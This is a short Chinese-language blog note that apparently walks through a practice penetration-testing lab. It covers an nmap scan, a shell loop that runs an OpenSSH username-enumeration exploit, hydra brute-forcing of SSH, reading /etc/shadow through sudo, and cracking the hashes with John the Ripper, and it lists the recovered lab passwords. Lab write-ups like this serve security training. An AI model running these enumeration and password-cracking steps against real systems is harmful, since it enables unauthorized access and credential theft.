nmap
- 21/tcp ftp vsftp (broken: could not bind listening IPv4 socket)
- 22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
- 25/tcp open smtp SendMail 8.13.7
- 80/tcp open Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
- 110/tcp open pop3 Openwall popa3d
- 143/tcp open imap UW imapd 2004.357
员工姓名
脚本生成一些用户名
配合 OpenSSH 2.3 < 7.7 - Username Enumeration
while read user; do
python ~/bin/ssh/enumeration/username 192.168.1.100 --username $user
done < ./users
hydra 暴力破解 ssh
ssh 用户名 bbanter 密码 bbanter
aadams 在 wheel 组
ssh 不允许 root 登录
换个字典
ssh 用户名 aadams 密码 nostradamus
su 需要 root 密码
但是可以 sudo cat /etc/shadow
下载 /etc/pass 和 /etc/shadow
john-the-ripper 暴力破解
ssh
- 用户名 root 密码 tarot
- 用户名 ccoffee 密码 hierophant
修复 vsftpd 错误配置
手动加载模块
ftp 用户 root 密码 tarot
No comments:
Post a Comment